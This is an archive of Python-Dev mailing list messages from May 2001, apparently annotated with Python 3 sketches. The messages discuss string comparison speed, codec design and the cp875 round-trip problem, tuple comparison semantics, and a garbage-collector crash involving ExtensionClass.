OTOH, 19% of all richcmp calls ended up calling oldcmp too, so the *net*
effect is muddy at best.
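To make the counters above concrete, here is a minimal Python 3 sketch of an equality test on byte strings that records which shortcut settles each call: identity, length, first byte, or a full compare. The function name `instrumented_eq` and the counter keys are hypothetical; this mirrors the idea behind Martin's instrumentation, not the actual C patch.

```python
from collections import Counter


def instrumented_eq(a, b, stats):
    """Return a == b for byte strings, tallying which test decided it."""
    if a is b:
        stats["identity"] += 1       # same object: equal without looking
        return True
    if len(a) != len(b):
        stats["length"] += 1         # different lengths can never be equal
        return False
    if a[:1] != b[:1]:
        stats["first_byte"] += 1     # same length, but the first byte differs
        return False
    stats["full_compare"] += 1       # fall back to comparing every byte
    return a == b


stats = Counter()
word = b"spam"
copy = bytes(bytearray(word))        # equal value, but a distinct object
for left, right in [(word, word), (word, b"eggs!"),
                    (word, b"ham!"), (word, copy)]:
    instrumented_eq(left, right, stats)
print(dict(stats))
```

Each of the four pairs is settled by a different test, so every counter ends at 1. Note that only the length and first-byte tests can answer "not equal" cheaply; an "equal" answer for distinct objects always needs the full compare.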

> To support the thesis that Py_EQ is the common case for strings, I
> counted the various operations:
>
> pyEQ:2271593
> pyLE:9234
> pyGE:0
> pyNE:20470
> pyLT:22765
> pyGT:578

This clearly wasn't doing much sorting of strings (or of tuples containing
strings, etc) -- .sort() never uses pyEQ (it only uses pyLT).

> Now, that might be flawed since comparing strings for equal is
> extremely frequent in the testsuite. To give more credibility to the
> data, I also ran setup.py with my instrumented ./python:

In the absence of non-trivial use of sorting or the bisect module or one of
the search tree modules out there, it's easy to buy that PyEQ is most common
for strings.  What's not clear is that adding a rich comparison slot actually
helps overall (as compared to continuing to let string_compare() handle it,
and if the pointer equality test actually saves more than it costs, adding it
there instead).  It's clearer that this is going to hurt sorting (& bisect
etc), by adding yet another layer of function call to get Py_LT resolved (as
for dict compares too, the string richcmp can't do anything to speed up Py_LT
that string oldcmp can't do just as efficiently -- indeed, that's the great
advantage oldcmp's "compare first character" test had:  that *can* decide
Py_LT in one byte much of the time (but length comparison cannot)).
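Tim's point about `Py_LT` can be seen in a small Python 3 sketch (the helper name is hypothetical). For an ordering test, unequal lengths settle nothing, because a longer string can sort either before or after a shorter one, while a differing first byte settles the answer immediately.

```python
def lt_first_byte(a, b):
    """Return (a < b, decided_by_first_byte) for two byte strings."""
    if a and b and a[0] != b[0]:
        # Indexing bytes yields ints, so this compares the leading byte values.
        return a[0] < b[0], True
    # Same first byte (or an empty operand): a full lexicographic compare is needed.
    return a < b, False


# Length alone cannot decide "<": the longer string may sort on either side.
print(lt_first_byte(b"ab", b"b"))     # (True, True): longer, yet smaller
print(lt_first_byte(b"ba", b"a"))     # (False, True): longer, and larger
print(lt_first_byte(b"abc", b"abd"))  # (True, False): first byte ties
```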

Note too earlier mail about how adding a richcmp slot to strings will
suddenly slow cmp(string1, string2) (which is the usual way to program a
search tree, because cmp() *used* to call a string comparison routine only
once; but after adding a richcmp slot, each cmp(string1, string2) will call
the richcmp slot from 1 thru 3 times (data-dependent)).
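The 1-to-3 call count can be illustrated with a Python 3 sketch that rebuilds a three-way `cmp()` on top of rich comparisons. It assumes the fallback tries `==`, then `<`, then `>`; the class and function names are hypothetical, and the real C fallback may order its attempts differently.

```python
class Counted:
    """Wraps a string and counts every rich comparison made on it."""
    calls = 0

    def __init__(self, s):
        self.s = s

    def __eq__(self, other):
        Counted.calls += 1
        return self.s == other.s

    def __lt__(self, other):
        Counted.calls += 1
        return self.s < other.s

    def __gt__(self, other):
        Counted.calls += 1
        return self.s > other.s


def three_way(a, b):
    """cmp()-style result built from rich comparisons: ==, then <, then >."""
    if a == b:
        return 0
    if a < b:
        return -1
    if a > b:
        return 1
    raise TypeError("no consistent ordering")


for x, y in [("a", "a"), ("a", "b"), ("b", "a")]:
    Counted.calls = 0
    result = three_way(Counted(x), Counted(y))
    print(result, Counted.calls)   # prints 0 1, then -1 2, then 1 3
```

Equal operands cost one call, but "greater than" costs three, which is why search-tree code built on `cmp()` is sensitive to this change.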

> ...
> That shows that optimizing for Py_NE is not worth it. With these data,
> I'll upload a patch to SF.

Which is here:

http://sourceforge.net/tracker/index.php?func=detail&aid=424335&
    group_id=5470&atid=305470

Heh:  let's grab all the ugly URLs off of SourceForge, stick them in a giant
list, and sort them.  Can't think of a more typical app than that <wink>.

Thanks for the work, Martin!


From tim.one at home.com  Wed May 16 10:51:17 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 04:51:17 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <15105.46090.203278.397835@anthem.wooz.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEHPKCAA.tim.one@home.com>

[Barry A. Warsaw]
> ...
> from types import StringType
> import time
> r = range(1000000)
>
> def one(r=r):
>     x = 'hello'
>     t0 = time.time()
>     for i in r:

Random clue:  when you're too lazy to try to subtract out loop overhead (not a
knock, I am too), you may have better luck with

    r = [1] * 1000000

than

    r = range(1000000)

The reason is that the former way gets to keep incref'ing and decref'ing a
single object (as it's repeatedly bound to "i" across iterations), instead of
slobbering all over memory inc'ing and dec'ing a million distinct objects.
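A Python 3 sketch of the comparison follows. Python 3's `range()` is lazy, so `list(range(N))` is used to get the million distinct objects Tim describes; the helper name is hypothetical. Timings vary by machine and interpreter version, and the gap may be small on a modern CPython.

```python
import time


def time_empty_loop(seq):
    """Time iteration alone: the loop body does no work."""
    t0 = time.perf_counter()
    for _ in seq:
        pass
    return time.perf_counter() - t0


N = 1000000
same = [1] * N             # one int object, referenced N times
distinct = list(range(N))  # N separate int objects, materialized up front

print("same object:      %.3fs" % time_empty_loop(same))
print("distinct objects: %.3fs" % time_empty_loop(distinct))
```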

there's-an-art-to-doing-nothing-quickly-ly y'rs  - tim


From tim.one at home.com  Wed May 16 10:56:56 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 04:56:56 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <20010515222738.A9996@thyrsus.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEHPKCAA.tim.one@home.com>

[poor Tim]
> In Python terms, those are Pythong lon (unbounded) ints today
                             ^^^^^^^
[Greg Ewing]
> What Pythonistas wear on their feet?

[Eric S. Raymond]
> No, man.  It's what sexy lady Pythonistas wear on the beach in Rio.

Eric wins!  That's indeed what I was thinking of.  I'm surprised nobody asked
what a lon was.  But not as surprised that I didn't try to blame this on an
Outlook 2000 bug.

> (Yes, I know some sexy lady Pythonistas.  No, you can't have their
> phone numbers.  Pthfthfthpht...)

Too much work anyway.  They can have mine:  703 758 8258.

but-they-better-*really*-love-python-cuz-i-give-quizzes-ly y'rs  - tim


From esr at thyrsus.com  Wed May 16 11:17:09 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 16 May 2001 05:17:09 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEHPKCAA.tim.one@home.com>; from tim.one@home.com on Wed, May 16, 2001 at 04:56:56AM -0400
References: <20010515222738.A9996@thyrsus.com> <LNBBLJKPBEHFEDALKOLCKEHPKCAA.tim.one@home.com>
Message-ID: <20010516051709.C11602@thyrsus.com>

Tim Peters <tim.one at home.com>:
> [poor Tim]
> > In Python terms, those are Pythong lon (unbounded) ints today
>                              ^^^^^^^
> [Greg Ewing]
> > What Pythonistas wear on their feet?
> 
> [Eric S. Raymond]
> > No, man.  It's what sexy lady Pythonistas wear on the beach in Rio.
> 
> Eric wins!  That's indeed what I was thinking of.  I'm surprised nobody asked
> what a lon was.  But not as surprised that I didn't try to blame this on an
> Outlook 2000 bug.
> 
> > (Yes, I know some sexy lady Pythonistas.  No, you can't have their
> > phone numbers.  Pthfthfthpht...)
> 
> Too much work anyway.  They can have mine:  703 758 8258.

Hmmm...now, which one of them should I try to talk into a snakeskin bikini?

Duh.  Answer obvious: the one I can talk *out* of a snakeskin bikini most 
rapidly afterwards.  Then I'll give her your number -- that is, if
I don't get too, er, distracted.

	seeming-like-a-good-time-to-practice-my-Timlike-wink'ly yours,
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Every Communist must grasp the truth, 'Political power grows out of
the barrel of a gun.'
        -- Mao Tse-tung, 1938, inadvertently endorsing the Second Amendment.


From mal at lemburg.com  Wed May 16 11:29:49 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 11:29:49 +0200
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCGEHLKCAA.tim.one@home.com>
Message-ID: <3B02488D.415BA95F@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > Round-tripping is obviously very important if you use Unicode
> > as basis for working on text.
> 
> Since I use 7-bit ASCII exclusively, I've been using
> 
>     encode = decode = lambda x: x
> 
> I haven't proved that's round-trippable, but haven't bumped into an exception
> yet.

For character map codecs the complete range(256) of possible
input characters should pass the round-trip test, that is

	encoded text -> Unicode -> encoded text

should result in the identity mapping for all c in map(chr,range(256)).
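The round-trip test above can be sketched in Python 3, where the encoded side is a `bytes` object (the helper name is hypothetical). Any byte value that fails to decode, fails to encode back, or comes back different is reported.

```python
def round_trip_failures(encoding):
    """Return the byte values 0..255 that do not survive bytes -> str -> bytes."""
    failures = []
    for c in range(256):
        raw = bytes([c])
        try:
            if raw.decode(encoding).encode(encoding) != raw:
                failures.append(c)
        except UnicodeError:       # covers both decode and encode errors
            failures.append(c)
    return failures


print(round_trip_failures("latin-1"))   # [] : every byte round-trips
print(len(round_trip_failures("ascii")))  # 128 : bytes 0x80..0xFF cannot decode
```

Calling `round_trip_failures("cp875")` lists whatever byte values the cp875 tables in your Python version fail to round-trip; that result depends on those tables, so no output is claimed here.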
 
> > I don't know about the reasoning behind making cp875 fail the
> > round-trip -- Unicode certainly provides means to make mappings
> > round-trip safe (e.g. by reverting to the private Unicode
> > char. point areas).
> 
> Then I ignorantly but confidently (indeed, with the cheery confidence only
> the truly ignorant can truly enjoy!) vote for your approach that maps the
> non-round-trippable cp875 code points to None.  Better safe than sorry, by
> default.  Else 6 of the 7 ambiguous chars will be silent surprises by
> default.

I will check in a patch which moves the building logic for encoding
maps to codecs.py. This will simplify the task of choosing the
"right" solution. Currently I'm in favour of:

def make_encoding_map(decoding_map):

    """ Creates an encoding map from a decoding map.

        If a target mapping in the decoding map occurs multiple
        times, then that target is mapped to None (undefined mapping),
        causing an exception when encountered by the charmap codec
        during translation.

        One example where this happens is cp875.py which decodes
        multiple characters to \u001a.

    """
    m = {}
    for k,v in decoding_map.items():
        if not m.has_key(v):
            m[v] = k
        else:
            m[v] = None
    return m
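`dict.has_key()` no longer exists in Python 3, so for readers on a current interpreter the same inversion can be written with the `in` operator. This is a transliteration sketch of the function above, not the code that was eventually checked in; the sample map is made up.

```python
def make_encoding_map(decoding_map):
    """Invert a decoding map; targets reached from several sources map to None."""
    m = {}
    for k, v in decoding_map.items():
        if v not in m:
            m[v] = k
        else:
            m[v] = None  # ambiguous: the charmap codec will refuse to encode v
    return m


# Two source bytes decode to U+001A, so U+001A becomes unencodable.
sample = {0x3f: 0x1a, 0xff: 0x1a, 0x41: 0x41}
print(make_encoding_map(sample))   # {26: None, 65: 65}
```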

Perhaps we should also have a codecs.finalize_decoding_map() API
in codecs.py which checks the decoding map and postprocesses
it in case it finds a problem ?!
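One reading of the `finalize_decoding_map()` idea is a check that reports every target reached from more than one source. The function name below is hypothetical and the sample map is made up; this is a Python 3 sketch, not a proposed API.

```python
from collections import defaultdict


def ambiguous_targets(decoding_map):
    """Map each target reached from several sources to the sorted source list."""
    sources = defaultdict(list)
    for k, v in decoding_map.items():
        sources[v].append(k)
    return {v: sorted(ks) for v, ks in sources.items() if len(ks) > 1}


sample = {0x3f: 0x1a, 0xff: 0x1a, 0x41: 0x41}
print(ambiguous_targets(sample))   # {26: [63, 255]}
```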

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Wed May 16 11:32:36 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 11:32:36 +0200
Subject: [Python-Dev] Comparison speed
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
		<200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
		<200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com> <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de>
Message-ID: <3B024934.58232325@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > Sounds like we ought to do a search-and-destroy on type comparisons,
> > replacing with isinstance() where possible.
> 
> At least in my applications, this is unfortunately not possible: I
> want a test for byte-string-or-unicode-string. This could be done with
> two isinstance calls, but that is certainly less efficient.
> 
> Marc-Andre once proposed a type representing the immediate supertype
> of both byte strings and unicode strings; let's call it abstract string.
> Then I could write isinstance(e, types.AbstractString).

I'm still holding on to that idea... hopefully, Guido's type
checkins will make this possible in 2.2 or 2.3. The same
should then be done for numbers, sequences and mappings (all
abstract "types" defined in abstract.c).
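For the byte-string-or-unicode test Martin describes, `isinstance()` later learned to accept a tuple of types (Python 2.2), which gives one call instead of two. A Python 3 sketch follows, where `bytes` and `str` play the roles of the 2.x byte and Unicode strings and share no common string base class; the function name is hypothetical.

```python
def is_any_string(e):
    """True for text (str) or binary (bytes) strings, using one isinstance call."""
    return isinstance(e, (str, bytes))


print(is_any_string("abc"), is_any_string(b"abc"), is_any_string(42))  # True True False
```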

-- 
Marc-Andre Lemburg


From mal at lemburg.com  Wed May 16 11:34:40 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 11:34:40 +0200
Subject: [Python-Dev] Comparison speed
References: <LNBBLJKPBEHFEDALKOLCEEHOKCAA.tim.one@home.com>
Message-ID: <3B0249B0.5DD10A4C@lemburg.com>

Tim Peters wrote:
> 
> [Martin]
> > Producing numbers is easy :-)
> 
> If only making sense of them were too <0.6 wink>.

FYI, I've added a few compare tests to pybench which now is
available as version 0.9. You can download it from my Python
page.

-- 
Marc-Andre Lemburg


From mwh at python.net  Wed May 16 12:53:16 2001
From: mwh at python.net (Michael Hudson)
Date: 16 May 2001 11:53:16 +0100
Subject: [Python-Dev] Easy codec access
In-Reply-To: Guido van Rossum's message of "Tue, 15 May 2001 11:35:09 -0500"
References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com>
Message-ID: <m31yppo99f.fsf@atrus.jesus.cam.ac.uk>

Guido van Rossum <guido at digicool.com> writes:

> > I've just checked in a set of patches which implement the new
> > .decode() method along with a couple of useful codecs.
> 
> Cool!

Indeed.  Good idea, Marc!

This is a bit unfriendly though:

>>> "bobbins".encode("gzip")
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function
    raise SystemError,\
SystemError: module "encodings.gzip" failed to register

I thought SystemErrors shouldn't ever happen (isn't it what gets
raised for an illegal opcode, for example?).
 
> > To see just how easy it is to write codecs, please have
> > a look at the string codecs I added in this patch (e.g.
> > zlib_codec.py or hex_codec.py). I am pretty sure that there
> > are a lot more useful things in the standard lib which could
> > benefit from these easy-to-use interfaces.
> 
> As an exercise, I added a quoted-printable codec.  It was easy
> indeed!

urlencode would be nice.  Maybe re.escape, too.  html entities?
That's probably a bigger can of worms, but 

print "<p>%s</p>"%text.encode("html")

seems delightfully simpleminded.
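Several of these string-to-string codecs survive in Python 3 as bytes-to-bytes codecs, reached through `codecs.encode()`/`codecs.decode()` rather than `str.encode()`. The standard library has no `html` codec, but `html.escape()` covers Michael's example. A sketch, assuming a current Python 3 where the `zlib`, `hex`, `base64` and `quopri` codec aliases are available:

```python
import codecs
import html

payload = b"bobbins"

# Binary transforms: bytes in, bytes out, each with a matching decode.
packed = codecs.encode(payload, "zlib")
hexed = codecs.encode(payload, "hex")
qp = codecs.encode(b"caf\xe9", "quopri")

assert codecs.decode(packed, "zlib") == payload
assert codecs.decode(hexed, "hex") == payload
assert codecs.decode(qp, "quopri") == b"caf\xe9"

# The base64 codec decodes the signature line used later in this thread.
print(codecs.decode(b"YW5vdGhlci1mdW4tdG95\n", "base64"))  # b'another-fun-toy'

# HTML escaping is a plain function rather than a codec.
text = "fish & chips <b>"
print("<p>%s</p>" % html.escape(text))  # <p>fish &amp; chips &lt;b&gt;</p>
```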

Cheers,
M.

-- 
  GAG: I think this is perfectly normal behaviour for a Vogon. ...
VOGON: That is exactly what you always say.
  GAG: Well, I think that is probably perfectly normal behaviour for a
      psychiatrist. -- The Hitch-Hikers Guide to the Galaxy, Episode 9


From mal at lemburg.com  Wed May 16 13:06:14 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 13:06:14 +0200
Subject: [Python-Dev] Easy codec access
References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <m31yppo99f.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <3B025F26.A625DE02@lemburg.com>

Michael Hudson wrote:
> 
> Guido van Rossum <guido at digicool.com> writes:
> 
> > > I've just checked in a set of patches which implement the new
> > > .decode() method along with a couple of useful codecs.
> >
> > Cool!
> 
> Indeed.  Good idea, Marc!

Thanks :-)
 
> This is a bit unfriendly though:
> 
> >>> "bobbins".encode("gzip")
> Traceback (most recent call last):
>   File "<stdin>", line 1, in ?
>   File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function
>     raise SystemError,\
> SystemError: module "encodings.gzip" failed to register
> 
> I thought SystemErrors shouldn't ever happen (isn't it what gets
> raised for an illegal opcode, for example?).

This is due to the zlib module not being installed. The reason
for the search function in encodings/__init__.py raising a
SystemError is that it did find a module named gzip, but this
module does not export the needed registration API getregentry().

Perhaps it should just raise a LookupError instead, though...
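In today's `codecs` module, a search function signals "not mine" by returning `None`; if no registered search function claims a name, `codecs.lookup()` raises `LookupError`, the friendlier failure discussed here. A minimal Python 3 sketch with a made-up `upperdemo` codec (all names below are hypothetical):

```python
import codecs


def _upper_encode(text, errors="strict"):
    # Codec functions return (output, number of input items consumed).
    return text.upper(), len(text)


def _upper_decode(text, errors="strict"):
    return text.lower(), len(text)


_DEMO_CODECS = {
    "upperdemo": codecs.CodecInfo(_upper_encode, _upper_decode, name="upperdemo"),
}


def demo_search(name):
    # Return a CodecInfo for names we own, None for everything else.
    return _DEMO_CODECS.get(name)


codecs.register(demo_search)

print(codecs.encode("bobbins", "upperdemo"))   # BOBBINS
try:
    codecs.lookup("nonesuchdemo")
except LookupError as exc:
    print("LookupError:", exc)
```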
 
> > > To see just how easy it is to write codecs, please have
> > > a look at the string codecs I added in this patch (e.g.
> > > zlib_codec.py or hex_codec.py). I am pretty sure that there
> > > are a lot more useful things in the standard lib which could
> > > benefit from these easy-to-use interfaces.
> >
> > As an exercise, I added a quoted-printable codec.  It was easy
> > indeed!
> 
> urlencode would be nice.  Maybe re.escape, too.  html entities?
> That's probably a bigger can of worms, but
> 
> print "<p>%s</p>"%text.encode("html")
> 
> seems delightfully simpleminded.

Right. That's the idea... volunteers are welcome :-) 

There are lots of those little "escape this, encode that" tasks 
which could benefit from the codec machinery. The ones you
mention would certainly be good candidates. pickle and marshal
would also be good to have wrapped as codecs.

-- 
Marc-Andre Lemburg


From mwh at python.net  Wed May 16 13:19:15 2001
From: mwh at python.net (Michael Hudson)
Date: 16 May 2001 12:19:15 +0100
Subject: [Python-Dev] Easy codec access
In-Reply-To: "M.-A. Lemburg"'s message of "Wed, 16 May 2001 13:06:14 +0200"
References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <m31yppo99f.fsf@atrus.jesus.cam.ac.uk> <3B025F26.A625DE02@lemburg.com>
Message-ID: <m3y9rxmtho.fsf@atrus.jesus.cam.ac.uk>

"M.-A. Lemburg" <mal at lemburg.com> writes:

> > This is a bit unfriendly though:
> > 
> > >>> "bobbins".encode("gzip")
> > Traceback (most recent call last):
> >   File "<stdin>", line 1, in ?
> >   File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function
> >     raise SystemError,\
> > SystemError: module "encodings.gzip" failed to register
> > 
> > I thought SystemErrors shouldn't ever happen (isn't it what gets
> > raised for an illegal opcode, for example?).
> 
> This is due to the zlib module not being installed. 

No it's not, actually.  I *thought* I was getting the error message
because the zlib encoding doesn't alias itself to gzip (whether it
should or not is another question).  But in fact if you specify a
bogus encoding you get a nice error message:

>>> "bobbins".encode("nonesuch")
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
LookupError: unknown encoding

but:

>>> "bobbins".encode("sys")
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function
    raise SystemError,\
SystemError: module "encodings.sys" failed to register

I have to admit I don't really know what's going on here, but the
error is just confusing.

> The reason for the search function in encodings/__init__.py raising
> a SystemError is that it did find a module named gzip, but this
> module does not export the needed registration API getregentry().

Yep.  

> Perhaps it should just raise a LookupError instead, though...

Might be easiest.

> > urlencode would be nice.  Maybe re.escape, too.  html entities?
> > That's probably a bigger can of worms, but
> > 
> > print "<p>%s</p>"%text.encode("html")
> > 
> > seems delightfully simpleminded.
> 
> Right. That's the idea... volunteers are welcome :-) 

Maybe this evening.

> There are lots of those little "escape this, encode that" tasks 
> which could benefit from the codec machinery. The ones you
> mention would certainly be good candidates. pickle and marshal
> would also be good to have wrapped as codecs.

Ooh yes, hadn't thought of them.

'YW5vdGhlci1mdW4tdG95\n'.decode("base64")-ly y'rs
M.

-- 
  There's an aura of unholy black magic about CLISP.  It works, but
  I have no idea how it does it.  I suspect there's a goat involved
  somewhere.                     -- Johann Hibschman, comp.lang.scheme


From aahz at rahul.net  Wed May 16 15:16:18 2001
From: aahz at rahul.net (Aahz Maruch)
Date: Wed, 16 May 2001 06:16:18 -0700 (PDT)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <20010515222738.A9996@thyrsus.com> from "Eric S. Raymond" at May 15, 2001 10:27:38 PM
Message-ID: <20010516131618.C40CC99C91@waltz.rahul.net>

Eric S. Raymond wrote:
> 
> (Yes, I know some sexy lady Pythonistas.  No, you can't have their
> phone numbers.  Pthfthfthpht...)

That's okay, I have their e-mail addresses.  Wanna bet on which of us
gets a response first?
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From barry at digicool.com  Wed May 16 15:42:15 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 16 May 2001 09:42:15 -0400
Subject: [Python-Dev] Comparison speed
References: <15105.46090.203278.397835@anthem.wooz.org>
	<LNBBLJKPBEHFEDALKOLCAEHPKCAA.tim.one@home.com>
Message-ID: <15106.33719.14403.13051@anthem.wooz.org>

>>>>> "TP" == Tim Peters <tim.one at home.com> writes:

    TP> Random clue: when you're too lazy to try to subtract out loop
    TP> overhead (not a knock, I am too), you may have better luck
    TP> with

    TP>     r = [1] * 1000000

    TP> than

    TP>     r = range(1000000)

Ah, good point!


From guido at digicool.com  Wed May 16 17:01:40 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 16 May 2001 10:01:40 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Wed, 16 May 2001 09:28:45 +0200."
             <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de> 
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com> <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com>  
            <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de> 
Message-ID: <200105161501.KAA02226@cj20424-a.reston1.va.home.com>

> Marc-Andre once proposed a type representing the immediate supertype
> of both byte strings and unicode strings; let's call it abstract string.
> Then I could write isinstance(e, types.AbstractString).

This will probably be doable in 2.2.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Wed May 16 17:24:55 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 16 May 2001 10:24:55 -0500
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49
In-Reply-To: Your message of "Tue, 15 May 2001 20:01:05 -0400."
             <LNBBLJKPBEHFEDALKOLCGEGMKCAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCGEGMKCAA.tim.one@home.com> 
Message-ID: <200105161524.KAA02518@cj20424-a.reston1.va.home.com>

> The question remaining is how much of this list/tuple richcmp behavior is
> guaranteed by the language and how much is just implementation-dependent
> fuzz.

Unclear what you're asking.  The language doesn't require any
particular semantics for sequence comparisons, but the language of
course includes the tuple and list sequence types, and it describes
(albeit lacking some rigorous detail) what comparisons for those do.
If there are specific lacks of detail, it probably helps to think
about filling those in.

> For a more vanilla example, I removed the EQ/NE "lengths differ?"
> tuple richcmp early-exit test because I never found code that made
> it trigger (but tons of code that gets there without triggering).
> But this has semantic implications too: an implementation without
> the early exit may call user-defined comparison routines that raise
> exceptions when comparing tuples of different lengths now.  Do you
> care?  (I don't.)

I don't care about exceptions either in this case; the shortcut seems
fair game.
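The semantic point about the early exit can be seen in a Python 3 sketch of element-wise tuple equality, with and without a length check up front. The names are hypothetical, and the element class raises from `__eq__` only to make visible whether element comparisons happen at all.

```python
class Touchy:
    """Element whose __eq__ raises, to reveal whether it is ever called."""

    def __eq__(self, other):
        raise RuntimeError("element comparison reached")


def tuples_equal(a, b, length_shortcut=True):
    """Element-wise equality of two tuples."""
    if length_shortcut and len(a) != len(b):
        return False                 # early exit: no element is examined
    for x, y in zip(a, b):
        if not x == y:
            return False
    return len(a) == len(b)


short, longer = (Touchy(),), (Touchy(), 1)
print(tuples_equal(short, longer))   # False, decided by length alone
try:
    tuples_equal(short, longer, length_shortcut=False)
except RuntimeError as exc:
    print("without the shortcut:", exc)
```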

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip at pobox.com  Wed May 16 16:28:04 2001
From: skip at pobox.com (skip at pobox.com)
Date: Wed, 16 May 2001 09:28:04 -0500
Subject: [Python-Dev] Easy codec access
In-Reply-To: <3B025F26.A625DE02@lemburg.com>
References: <3B011CA8.9DDB4FC7@lemburg.com>
	<200105151635.LAA29530@cj20424-a.reston1.va.home.com>
	<m31yppo99f.fsf@atrus.jesus.cam.ac.uk>
	<3B025F26.A625DE02@lemburg.com>
Message-ID: <15106.36468.62292.611515@beluga.mojam.com>

    mal> pickle and marshal would also be good to have wrapped as codecs.

Why?  They operate on much more than strings.

-- 
Skip Montanaro (skip at pobox.com)
(847)971-7098


From fredrik at effbot.org  Wed May 16 17:07:18 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Wed, 16 May 2001 17:07:18 +0200
Subject: [Python-Dev] Easy codec access
References: <3B011CA8.9DDB4FC7@lemburg.com><200105151635.LAA29530@cj20424-a.reston1.va.home.com><m31yppo99f.fsf@atrus.jesus.cam.ac.uk><3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com>
Message-ID: <002101c0de19$e7875a90$e46940d5@hagrid>

skip wrote:

>     mal> pickle and marshal would also be good to have wrapped as codecs.
> 
> Why?  They operate on much more than strings.

hypergeneralization, of course.

more candidates:

    "10".decode("int")
    "10.0".decode("float")
    "[1, 2, 3]".decode("list")
    "readme.txt".decode("file")
    "SyntaxError".decode("raise")
    (etc)

Cheers /F


From nas at python.ca  Wed May 16 18:19:42 2001
From: nas at python.ca (Neil Schemenauer)
Date: Wed, 16 May 2001 09:19:42 -0700
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>; from martin@loewis.home.cs.tu-berlin.de on Mon, May 14, 2001 at 09:40:21PM +0200
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com> <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>
Message-ID: <20010516091942.A16455@glacier.fnational.com>

Martin v. Loewis wrote:
> In any case, I think you need to analyse this in a debugger.

#7  0x080bc17e in tupletraverse (o=0x8154914, visit=0x807d640 <visit_decref>, 
    arg=0x0) at ../Objects/tupleobject.c:366
366                             err = visit(x, arg);
(gdb) p *o
$11 = {ob_refcnt = 1, ob_type = 0x80eb5a0, ob_size = 1, ob_item = {0x402c5180}}
(gdb) p *o->ob_item[0]
$12 = {ob_refcnt = 2, ob_type = 0x0}

In other words the GC is finding a tuple object that contains an
element with a funny looking address (data segment?) and an
ob_type of NULL.  The collector has started running from here:

#10 0x0807debc in collect_generations () at ../Modules/gcmodule.c:467
#11 0x0807dfc4 in _PyGC_Insert (op=0x819f57c) at ../Modules/gcmodule.c:507
#12 0x080af56a in PyDict_New () at ../Objects/dictobject.c:149
#13 0x0808d8b8 in getBaseDictionary (type=0x402bcc40)
    at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:1249
#14 0x0808eb45 in initializeBaseExtensionClass (self=0x402bcc40)
    at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:1495
#15 0x08095fb1 in export_subclassed_type (dict=0x81851fc, 
    name=0x402a9388 "GdkDragContext", typ=0x402bcc40, bases=0x816fc34)
